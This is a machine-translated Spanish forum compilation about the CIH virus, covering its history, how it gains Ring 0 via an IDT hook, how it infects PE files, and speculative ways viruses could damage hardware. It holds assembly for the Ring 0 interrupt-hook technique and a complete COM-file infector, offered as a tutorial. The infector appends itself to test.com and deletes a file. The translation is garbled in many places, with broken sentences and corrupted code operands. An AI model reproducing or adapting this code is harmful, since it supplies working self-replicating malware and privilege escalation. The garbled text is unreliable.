Si la portabilidad del ensamblaje es deficiente, ¿cómo puede CIH destruir una gran cantidad de computadoras?
El famoso virus CIH (el virus CIH es el primer virus descubierto que daña directamente el hardware del sistema informático).
Zao publicado el 2005-3-18 21:04:24
El origen del virus CIH
CIH fue descubierto por primera vez en Taiwán. Según informes oficiales de Taipei, el virus informático fue compilado por Chen Ing-Halu, de 24 años. Las primeras letras son C, I y H, por lo que este puede ser el origen del nombre del virus informático.
------------------------------------------- ----- -------------------------------------
Introducción al virus CIH
p>Es uno de los virus más insidiosos jamás descubiertos. Cuando ataca, no sólo destruye el área de arranque y la tabla de particiones del disco duro, sino que también destruye el programa del sistema en el chip flashBIOS del sistema informático, causando daños a la placa base. El virus CIH es el primer virus descubierto que daña directamente el hardware del sistema informático.
------------------------------------------- ----- -------------------------------------
El Historial de desarrollo del virus CIH
Versión del virus CIH v1.0:
La versión inicial V1.0 tiene solo 656 bytes. Su prototipo es relativamente simple y no es muy diferente de los virus comunes. En cuanto a la estructura, su mayor "punto de venta" es que era uno de los pocos virus que podía infectar los archivos ejecutables de Microsoft Windows PE. La longitud de los archivos de programa infectados aumentó y esta versión de CIH no fue destructiva.
Versión del virus CIH v1.1:
Cuando se desarrolló a la versión v1.1, la longitud del virus era de 796 bytes. Esta versión del virus CIH tiene la función de juzgar el software WinNT. , una vez que se determina que el usuario está ejecutando WinNT, no tendrá ningún efecto y se ocultará para evitar generar mensajes de error. Al mismo tiempo, se utilizará código más optimizado para reducir su longitud. Otro punto excelente de esta versión de CIH es que puede utilizar los "espacios" en el archivo ejecutable de clase WIN PE para dividirse en varias partes según sea necesario e insertarlas en el archivo ejecutable de clase PE respectivamente. Las ventajas de esto son al infectar. la mayoría de los archivos WINPE, no aumentará la longitud del archivo.
Virus CIH versión v1.2:
Cuando se desarrolló a la versión v1.2, además de corregir algunos defectos de la versión v1.1, también agregó la capacidad de destruir la información del usuario. disco duro. Además del código del programa BIOS del host del usuario, esta mejora lo hace entrar en las filas de los virus malignos. La longitud de esta versión del virus CIH es de 1003 bytes.
Virus CIH versión v1.3:
El mayor defecto de la versión original v1.2 del virus CIH es que cuando infecta un archivo ZIP autoextractor, provocará esto El archivo ZIP aparecerá durante la autoextracción:
Encabezado de WinZip Self-Extractor dañado
Posible causa: error de transferencia de disco o archivo
Mensaje de advertencia de error. La versión v1.3 del virus CIH parece tener prisa y su punto de mejora es solucionar los defectos anteriores. Su método de mejora es: una vez que se determina que el archivo abierto es un programa autoextraíble similar a WinZip. no se infectará. Al mismo tiempo, esta versión del virus CIH ha modificado el tiempo de aparición.
La longitud del virus CIH v1.3 es de 1010 bytes.
Versión CIH virus v1.4:
Esta versión del virus CIH mejora los defectos de versiones anteriores y no infecta archivos de paquetes autoextraíbles ZIP. Al mismo tiempo, la fecha. de aparición y fecha de aparición se modifican la información de derechos de autor en el virus (la información de la versión se cambió a: "CIH v1.4 TATUNG", la información relevante en la versión anterior era "CIH v1.x TTIT"), la longitud. de esta versión es de 1019 bytes.
De la descripción anterior, podemos ver que, de hecho, entre las versiones relevantes de CIH, solo la v1.2, v1.3 y v1.4 tienen daños reales. 2 del virus CIH es el 26 de abril de cada año, que actualmente es la versión del virus más popular. La fecha de ataque de la versión v1.3 es el 26 de junio de cada año, y la fecha de ataque de la versión CIH v1.4 fue cambiada. al 26 de cada mes. Este cambio acortó enormemente el período de ataque y aumentó su destructividad.
------------------------------------------- ----- -------------------------------------
Características y paradero de CIH
Fuentes de departamentos autorizados dicen que CIH es un virus puro de Windows95/98. Este virus utiliza exclusivamente la tecnología WindowsVxD (controlador de dispositivo virtual) cuando el virus ataca, el disco duro sigue girando. todos los datos se destruirán y la información de la partición del disco duro también se perderá; además, cuando el virus CIH ataca, también puede destruir el BIOS de la memoria de solo lectura regrabable eléctricamente (E2PROM) en algunos tipos de placas base. BIOS es el "Sistema básico de entrada/salida" de la computadora. Almacena los parámetros de hardware y controladores más básicos del sistema. Una vez dañado, el sistema no puede iniciarse en absoluto. fabricante y vuelva a grabar el BIOS. En este momento, si el usuario no desea enviarlo de vuelta al fabricante para "volverlo a grabar" y utiliza el software de actualización del BIOS para volver a grabarlo, el software de actualización informará un error "Modelo E2PROM incorrecto". Esto significa que el virus CIH tiene considerables capacidades destructivas para el hardware y puede destruir completamente una computadora.
La mayoría de los usuarios saben que los virus en el sentido tradicional destruyen datos en lugar de hardware. Por lo tanto, las copias de seguridad de datos frecuentes y las actualizaciones de software pueden evitar que los virus dañen los archivos de datos hasta cierto punto. Incluso si los archivos están infectados con virus, se puede usar software antivirus para eliminarlos, al menos para restaurar el sistema. lo más posible. Los expertos en antivirus creen que la aparición del CIH, que amenaza el hardware informático, significa que la batalla técnica entre virus y antivirus ha comenzado a sufrir cambios cualitativos.
"Según el análisis de seguimiento preliminar, el virus CIH se introdujo en el continente desde el extranjero". Wang Tiejian, experto en antivirus de Beijing Guanqun Jinchen Software Co., Ltd., dijo: "En la actualidad , el virus se transmite principalmente a través de Internet y, por supuesto, a medida que pasa el tiempo, los correos electrónicos se transmiten principalmente a través de disquetes o CD. "Según la información obtenida de la red autorizada de recopilación de virus, existen cinco tipos de virus CIH". original" y "variantes", y son mutuamente excluyentes. La diferencia es que el "original" hará que los archivos infectados crezcan, pero no es destructivo; mientras que la "variante" no hará crecer los archivos infectados, pero es altamente destructiva. Sus horas de inicio son el día 26 de abril y 26 de junio respectivamente y el día 26 de cada mes.
------------------------------------------- ----- -------------------------------------
Aplicación de los principios del virus CIH: lectura y escritura de memoria física
Las aplicaciones de Windows 95/98 no pueden leer ni escribir directamente en la memoria física. Si utiliza la programación VxD, puede llamar a la función VMM _MapPhysToLinear para asignar la dirección física. a la dirección lineal y luego modifíquela, pero esto es necesario escribir un VxD por separado, lo cual es más problemático. Entonces, ¿se puede llamar directamente a la función VMM en la aplicación? Generalmente no, porque la función VMM debe llamarse en el Anillo 0 y las aplicaciones generales funcionan en el Anillo 3. Entonces, ¿por qué el virus CIH puede llamar a la función VMM? El virus CIH utiliza una tecnología que utiliza la interrupción del procesador Intel para 3 Go. al Anillo 0, podemos usar completamente esta tecnología para llamar a la función VMM. El siguiente programa demuestra cómo modificar la memoria física, tomando la modificación del tamaño del sector cifrado (dirección física 0000:0525H) en el programa de cifrado de Windows 95 como un. ejemplo:
;****************************************** ** *************************************
* Núcleo del software de cifrado de Windows 95 módulo Uno - Programa de modificación del tamaño del sector del disco*
;* *
;* Este programa modifica el tamaño del sector del disco en la dirección física de la memoria 0000:0525 en la sección de Windows 95, *
; * Para poder modificar la dirección física, este programa utiliza la función VMM _MapPhysToLinear para asignar la dirección física *
* a la dirección lineal para su modificación. Para llamar a la función VMM en la aplicación, este programa utiliza el principio *
;* del virus CIH, usando interrupciones para transferir el sistema del Anillo 3 al Anillo 0, y luego llama a la función VMM. .
*
; * El prototipo del proceso ChangeSectorSize en este programa en VC se puede escribir como: *
; * *
* void _stdcall ChangeSectorSize( BYTE Tamaño del sector );************************************* ***** *************************************
. 386p
.model flat, stdcall
; Número de interrupción modificado Si este número de interrupción se cambia a 3, se puede evitar el seguimiento de Soft-ICE.
HookExceptionNo EQU 05h
.data
IDTR_1 db 6 dup(0) Guarda el registro de la tabla de descriptores de interrupciones
OldExceptionHook dd 0; ;Guardar la dirección de entrada de interrupción original
.code
;El proceso de modificación del tamaño del sector
ChangeSectorSize PROC SectorSize: BYTE
push eax
; obtiene la dirección del descriptor de interrupción modificado (puerta de interrupción)
sidt IDTR_1
mov eax, dword ptr IDTR_1 02h
agregar eax, HookExceptionNo*08h 04h
cli
; guardar la dirección de entrada de interrupción original
push ecx
mov ecx, dword ptr [eax]
mov cx, palabra ptr [eax-04h]
mov dword ptr OldExceptionHook, ecx
pop ecx
; Establezca la dirección de entrada de interrupción modificada en la nueva dirección de entrada del controlador de interrupciones
push ebx
lea ebx, NewExceptionHook
mov word ptr [eax-04h], bx
shr ebx, 10h
mov word ptr [eax 02h], bx
pop ebx
ejecución interrumpida, transferencia a Ring 0 (¡similar al principio del virus CIH!)
push ebx
mov bl, byte ptr SectorSize el tamaño del sector se almacena en el registro bl
int; HookExceptionNo
pop ebx
; Restaura la dirección de entrada de interrupción original
push ecx
mov ecx, dword ptr OldExceptionHook
mov palabra ptr [eax-04h],cx
shr ecx, 10h
mov palabra ptr [eax 02h],cx
pop ecx
;El proceso de modificación del tamaño del sector finaliza
sti
pop eax
ret
ChangeSectorSize ENDP
; Nuevo controlador de interrupciones
PROC NewExceptionHook
push eax
push ebx
push ecx
push edx
push esi
; Modificar tamaño del sector
push dword ptr 00000000h; Debe ser 0
push dword ptr 00000001h; p>push dword ptr 00000525h; Dirección física 0000: 0525
int 20h
dd 0001006ch Las dos instrucciones anteriores son equivalentes a VMMCall _MapPhysToLinear
pop esi
pop esi
pop esi
mov byte ptr [eax], bl; modificar tamaño del sector
; p>
pop esi
pop edx
pop ecx
pop ebx
pop eax
iretd
NewExceptionHook ENDP
end
Este proceso se puede llamar mediante lenguaje C, método de compilación: ml /c /coff w95enc.asm. Utilice MASM 6.11 o superior para compilar; no se requiere DDK. Inserte el archivo OBJ generado por la compilación en el proyecto VC, escriba la descripción del prototipo de función en el programa VC y luego podrá llamarlo.
------------------------------------------- ----- -------------------------------------
¿Cómo los virus dañan el hardware
Recientemente, el virus CIH ha hecho entrar en pánico a todos y ha causado un gran revuelo. En el pasado, varios virus sólo podían destruir los datos del disco duro en el mejor de los casos, pero CIH puede invadir el BIOS Flash de la placa base, destruir su contenido e inutilizar la placa base. La lección de CIH nos dice: no subestimes el daño que los virus pueden causar al hardware. Mucha gente ha empezado a preocuparse: el CIH se está volviendo cada vez más feroz y ¿habrá más virus que dañen el hardware?
La verdad es que lo analicé. Los "medios" utilizados por los virus para destruir el hardware incluyen los siguientes:
1. Destruir el monitor
Como todos sabemos, cada monitor tiene su propio ancho de banda, resolución máxima y campo. frecuencia de rendimiento. Los monitores en color de 14 pulgadas producidos en la etapa inicial tenían un ancho de banda de solo 35-45 MHz, y la resolución máxima correspondiente era de 1024 × 768 a 60 Hz de frecuencia de campo; los monitores en color de 14 pulgadas actuales en su mayoría tienen un ancho de banda de 60 MHz, y la resolución máxima correspondiente es 1024 × 768 a una frecuencia de campo de 75 Hz; pantalla a color de 15 pulgadas (gama alta), con un ancho de banda de 110 MHz, y la resolución más alta correspondiente es una frecuencia de campo de 1280 × 1024 a 85 Hz. Puede consultar el manual del monitor, que contiene la coincidencia de la frecuencia de campo y la resolución máxima. Si alguno de ellos excede, aparecerá una pantalla borrosa y, en casos graves, el monitor se quemará. Los virus pueden destruir la pantalla alterando los parámetros de la misma (como cambiar la resolución y la frecuencia de campo al nivel más alto admitido por la tarjeta gráfica, etc.). Aunque los nuevos monitores tienen comunicación del sistema y estandarización DDC, no es difícil para los virus aprovechar las lagunas. Por lo tanto, si descubre que la pantalla está borrosa durante el uso, debe apagarla inmediatamente, reiniciarla e ingresar al modo seguro para encontrar la causa.
2. Super FSB y la aplicación de voltaje dañarán la CPU, la tarjeta gráfica, la memoria, etc.
En la actualidad, cada vez más placas base nuevas utilizan "puentes suaves", lo que simplemente da miedo. Los virus tienen la oportunidad de aprovechar la oportunidad. El llamado "puente suave" significa que el voltaje, el FSB y el multiplicador de frecuencia de la CPU se pueden cambiar en el BIOS. Los virus pueden cambiar los parámetros del BIOS, aumentar el voltaje de la CPU para sobrecalentarlo y quemarlo, o aumentar el FSB de la CPU para sobrecargar la CPU, la tarjeta gráfica, la memoria y otros periféricos, provocando que se sobrecaliente y queme. El precursor de tal evento es un accidente. Por lo tanto, si descubre que la máquina falla con frecuencia, debe ir rápidamente al CMOS para ver si se han cambiado los parámetros anteriores. La buena noticia es que muchas placas base nuevas tienen actualmente una función de monitoreo de la temperatura de la CPU. Reducirán inmediatamente la frecuencia y la alarma después del sobrecalentamiento, lo que básicamente puede prevenir el desgaste del hardware.
3. Una "frecuencia gráfica" excesiva destruirá la tarjeta gráfica
Actualmente, muchas tarjetas gráficas de gama media y alta, como Voodoo, pueden cambiar manualmente la frecuencia de sus chips, y el método de cambio es más sencillo: en Windows 9x Cambia el registro. El virus cambia la "frecuencia del vídeo" y la tarjeta gráfica se sobrecarga y quema fácilmente. El precursor de tal acontecimiento es también un accidente. Por lo tanto, no olvide verificar la "frecuencia de visualización" cuando la computadora falla. Hay otra forma de reducir la posibilidad de que se queme la tarjeta gráfica, es decir... (¿¡Qué? ¿¡Has instalado dos ventiladores!?)
4. Destruye la unidad óptica
El cabezal óptico de la unidad óptica aumentará la potencia de emisión del láser cuando no pueda leer la señal, lo que es extremadamente perjudicial para la vida útil de la unidad óptica a largo plazo. Alguien hizo un experimento y pidió a una unidad óptica normal que leyera continuamente un disco con muchos rayones y una señal débil. Después de 28 horas, la unidad óptica se apagó. El virus puede hacer que el cabezal óptico vaya al borde del disco y lea el disco en el área donde no hay señal. Como resultado, el cabezal óptico no puede leer la señal, por lo que aumenta la potencia de transmisión y lee continuamente. Al cabo de unos días, la unidad óptica quedará "Sin disco". Por lo tanto, siempre debe prestar atención al parpadeo de la luz de la unidad óptica para determinar si la unidad óptica está funcionando normalmente.
5. Destruye la BIOS Flash de la placa base y la tarjeta gráfica.
Así es como el virus CIH actual destruye la placa base. El virus elimina el contenido del BIOS con códigos confusos, lo que hace que la máquina no pueda iniciarse. Sin embargo, muchas placas base ahora tienen puentes de protección contra escritura Flash BIOS, que pueden prevenir eficazmente que los virus CIH dañen la placa base. Pero no olvide que muchas tarjetas gráficas también tienen BIOS Flash. Quizás algún día aparezca un virus que destruya el BIOS de la tarjeta gráfica. Así que es mejor tener cuidado, ¡no existe una cura mágica para esto!
6. Destruir el disco duro
Como todos sabemos, el particionamiento y el formateo de alto nivel no causarán ningún daño al disco duro, pero el formateo de bajo nivel tendrá un mayor daño. impacto en la vida útil del disco duro. Se dice que un disco duro se desechará después de formatearlo a bajo nivel 10 veces. Si aparece un virus, mantiene la pista 0 del disco duro formateando bajo (¡hacerlo 10 veces sólo lleva unos segundos como máximo!), y si la pista 0 está rota, haz otra pista...la capacidad de tu disco duro. Se reducirá un poco (¡este bit es tan pequeño!) y las pistas 0, 1, 2... están rotas. Si desea volver a utilizar el disco duro, debe restablecer la pista inicial. el BIOS y realizar formateo de bajo nivel. Muy problemático. De hecho, existe un método de prevención muy simple y efectivo para este virus, que consiste en habilitar la protección antivirus del sector de arranque en el BIOS. El autor ha realizado experimentos cuando se enciende el interruptor anterior y se utilizan varios programas de formateo de bajo nivel (incluido el incluido en el BIOS) para formatear el disco duro, el BIOS emitirá una alarma (informando que hay un programa). intentando reescribir el área de inicio y preguntando si continuar), presione N para evitarlo. Debes saber que el programa BIOS está a cargo del máximo control del sistema, y nada debería poder atravesar sus defensas (otra cuestión es si presionas Y). Si encuentra la situación anterior, reinicie rápidamente y luego ejecute el antivirus. Sin embargo, si se encuentra con esta situación al instalar sistemas operativos como Win 98 o software como System Commander, no necesita prestarle atención. porque este software tiene ciertos requisitos durante la instalación. Vuelva a escribir el sector de arranque.
Sin embargo, le aconsejo que desactive la protección contra escritura al instalar este software; de lo contrario, es fácil que se bloquee.
7. Tinta residual de las impresoras de inyección de tinta. Las boquillas de las impresoras de inyección de tinta son particularmente fáciles de obstruir. Por esta razón, las empresas de impresión han inventado especialmente una función de "boquilla de limpieza" que desperdicia específicamente tinta, lo que permite una gran cantidad de tinta. cantidad de tinta salga corriendo de la boquilla y límpiela. Esta función puede controlarse mediante software, por lo que el virus llamará a esta función una y otra vez sin que nadie se dé cuenta, pero no escuchará el gemido de la impresora. Cuando te enteras, se ha desperdiciado mucha tinta. La única forma de prevenir este virus es... apagar la impresora cuando no esté en uso. De hecho, siempre que prestes atención a la luz de modo de la impresora, normalmente parpadea al limpiar la boquilla. Además, escuche atentamente su chirrido. Al limpiar la boquilla, el cabezal de impresión siempre tiene que moverse hacia adelante y hacia atrás varias veces (para calentar).
Escribí 7 artículos de una vez. De hecho, ¡todo el mundo sabe que hay muchas ideas torcidas para dañar el hardware! Este artículo solo quiere recordarles a los amigos que acaban de salir de la sombra de CIH: hay miles de formas de tener éxito (por supuesto, el éxito del compilador de virus), eliminar CIH y todavía hay quienes llegan tarde. ¡Asegúrese de llevar adelante todo tipo de espíritu y proteger la computadora construida con el dinero que tanto le costó ganar! Además, casi todos los puntos de este artículo tienen medidas preventivas (aunque algunas parecen una tontería), pero estos métodos no son omnipotentes (también hay que tener cuidado de no ignorar uno e ignorar el otro si el "pollo" de alguien lo es). destruido por el nuevo virus en el futuro, ¡soy un irresponsable!
¿Qué método utiliza CIH para infectar?
En lo que respecta a las técnicas, el principio es principalmente utilizar el método de programación VxD (controlador de dispositivo virtual) de Windows. El propósito de utilizar este método es obtener altos permisos de CPU. El virus CIH primero usa SIDT para obtener la dirección base de IDT (dirección base de la tabla de descriptores de interrupción), luego cambia la dirección de entrada INT 3 del IDT para que apunte a la parte de entrada del programa INT3 del propio CIH y luego se usa a sí mismo para generar una instrucción INT 3 para ejecutar. a la propia entrada INT 3 de CIH. El programa sale, de modo que el virus CIH puede obtener el nivel más alto de autoridad (es decir, autoridad 0), y luego el virus verificará si el valor del registro DR0 es 0 para determinar si es un virus CIH. ha residido anteriormente. Si el valor de DR0 no es 0, significa que el programa de virus CIH ha residido y la copia de CIH restaurará la entrada INT 3 original y luego saldrá normalmente (esta característica también puede ser utilizada por nosotros para engañar al programa CIH para evitar de residente permanecen en la memoria, pero deben protegerse contra posibles derivaciones posteriores). Si se determina que el valor DR0 es 0, el virus CIH intentará residir. Primero asigna el valor del registro EBX actual al registro DR0 para generar una marca de residencia y luego llama a la interrupción INT 20 y usa VxD. call Page Asignar llamada al sistema, que requiere Asignar memoria del sistema de Windows (memoria del sistema). El rango de direcciones de la memoria del sistema de Windows es C0000000h~FFFFFFFFh. Es un área de memoria que se utiliza para almacenar todos los controladores virtuales si el programa desea residir en la memoria. Durante mucho tiempo, debe solicitar esta sección. La memoria interna se aplica a la memoria cuyo espacio de direcciones asignado está por encima de C0000000h.
Si la aplicación de la memoria tiene éxito, el código de virus que originalmente se dividió en varios segmentos se recopilará del archivo infectado, se combinará y se colocará en el espacio de memoria solicitado. Después de completar el proceso de combinación y colocación, El virus CIH llamará nuevamente a la interrupción INT 3 para ingresar al programa de entrada INT 3 del cuerpo del virus CIH, y luego llamará a INT20 para completar la llamada de una subrutina IFSMgr_InstallFileSystemApiHook, que se utiliza para montar ganchos en la función de procesamiento del sistema de archivos para interceptar.
Operación de llamada de archivo y luego modifique la entrada de IFSMgr_InstallFileSystemApiHook, completando así el trabajo de enlace y, al mismo tiempo, IFSMgr_Ring0_FileIO predeterminado de Windows (InstallableFileSystemManager, IFSMgr). La dirección de entrada del programa de servicio se reservará para facilitar la llamada del virus CIH. De esta manera, una vez que se requiere una llamada para abrir un archivo, CIH interceptará el archivo lo antes posible y determinará si el archivo es un archivo ejecutable. Formato PE. En caso afirmativo, entonces está infectado. Si no, déjelo ir y transfiera la llamada al programa de servicio IFSMgr_IO normal de Windows. CIH
No infectará archivos en formato PE repetidamente. Al mismo tiempo, si el atributo de solo lectura del archivo ejecutable es válido no afecta el proceso de infección, la fecha y la hora. La información del archivo permanecerá sin cambios. Para la mayoría de los programas PE, después de ser infectados, la duración del programa permanecerá sin cambios y CIH se dividirá en múltiples segmentos y los insertará en el espacio vacío del programa. Después de completar el trabajo residente, el virus CIH restaurará la entrada INT 3 en la tabla de interrupciones IDT original a su estado original.
Escribir virus es una tecnología sofisticada. Los virus reales generalmente tienen las siguientes características: contagiosos, ocultos (también conocidos como latentes) y destructivos. Existen muchos tipos de virus hoy en día, como virus comunes que infectan archivos ejecutables, virus de macro, etc. Pero los virus originales y más destructivos son aquellos que infectan archivos ejecutables (como el virus CIH), y estos virus generalmente están escritos en lenguaje ensamblador. Muchas personas sienten curiosidad y anhelan los virus, pero a menudo se ven disuadidas por problemas como la dificultad de aprender el lenguaje ensamblador.
Este artículo le enseña cómo crear un programa simple. Aunque este programa no es un virus, es contagioso y el contagio de los virus suele ser el más difícil de lograr para la gente común.
Bien, ahora pasemos al tema. Hablemos de cómo se infecta el virus y cómo se ejecuta en el archivo infectado después de la infección. De hecho, la razón es muy simple: el virus generalmente escribe su nombre. código y lo ejecuta al final del archivo, el archivo ejecutable primero ejecutará el código de virus al final del archivo y luego volverá al código original para su ejecución.
Ahora pongamos un ejemplo para ilustrar:
;---------------------------------- -------
Función: Infectar el archivo test.com en la carpeta actual
y eliminar el archivo del.txt en la carpeta actual
;; Muestra la cadena predeterminada
CSEG SEGMENT
ASUME CS: CSEG, DS: CSEG, SS: CSEG
PROC principal NEAR
mainstart:
CALL vstart; donde comienza el código del virus
vstart:
POP SI obtiene la dirección actual
MOV BP, SI; guardar la dirección actual
PUSH SI
MOV AH, 9
ADD SI, mensaje OFFSET-OFFSET vstart muestra la cadena predeterminada<; /p>
p>
MOV DX, SI
INT 21h
POP SI
AÑADIR SI, OFFSET yuan4byte-OFFSET vstart; los primeros cuatro en los bytes del programa original
MOV DI, 100h; dirección de destino
MOV AX, DS: [SI]; comenzar a copiar
MOV DS: [DI], AX
INC SI
INC SI
INC DI
INC DI
MOV AX , DS: [SI ]
MOV DS: [DI], AX
MOV SI, BP; restaurar valor de dirección
MOV DX, OFFSET delname-OFFSET vstart
AGREGAR DX, SI
MOV AH, 41h
INT 21h
MOV DX, nombre de archivo OFFSET-OFFSET vstart; nombre
AÑADIR DX, SI
MOV AL, 02
MOV AH, 3dh escribir archivo
INT 21h
Error de JC
MOV BX, AX; identificador de archivo
MOV DX, OFFSET yuan4byte-OFFSET vstart lee los primeros cuatro bytes del archivo
AGREGAR DX, SI
MOV CX, 4
MOV AH, 3fh
INT 21h
MOV AX, 4202h hasta el final; del archivo
XOR CX, CX
XOR DX, DX
INT 21h
MOV DI, OFFSET new4byte-OFFSET vstart; guarda el lugar para saltar
AÑADIR DI, 2
AÑADIR DI, SI
SUB AX, 4
MOV DS: [DI ], AX
AÑADIR SI, OFFSET mainstart-OFFSET vstart; Prepararse para escribir virus
MOV DX, SI
MOV vsizes, OFFSET vends-OFFSET m
ainstart
MOV CX, vsizes
MOV AH, 40h
INT 21h
MOV SI, BP localiza el encabezado del archivo
p> p>
MOV AL, 0
XOR CX, CX
XOR DX, DX
MOV AH, 42h
INT 21h
MOV AH, 40h; escribir nuevo encabezado de archivo
MOV CX, 4
MOV DX, OFFSET new4byte-OFFSET vstart
AÑADIR DX, SI
INT 21h
MOV AH, 3eh; Cerrar archivo
INT 21h
error:
p>MOV AX, 100h
PUSH AX
RET
ENDP principal
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB 'M', 0e9h, 0, 0
nombre de archivo DB "test.com", 0
delname DB "del.txt", 0
mensaje DB "¡Je, je, je!" 0dh , 0ah, "$"
ventas:
inicio:
MOV AX, CSEG
MOV DS, AX
MOV SS, AX
LLAMADA principal
MOV AX, 4c00h
INT 21h
CSEG FINALIZA
END start
El código de programa anterior es simple y puede infectar archivos COM. También es el primer programa que hice que fue infectivo. ¿cómo? No es difícil.
Adjunto:
Cuando se ejecuta el archivo COM, todo el contenido del archivo COM se copiará a la memoria. La dirección inicial es 100 y luego se ejecutará.
No hay nada. Tiene atributos como uniones y segmentos, por lo que los virus de archivos COM son los virus más simples y simples.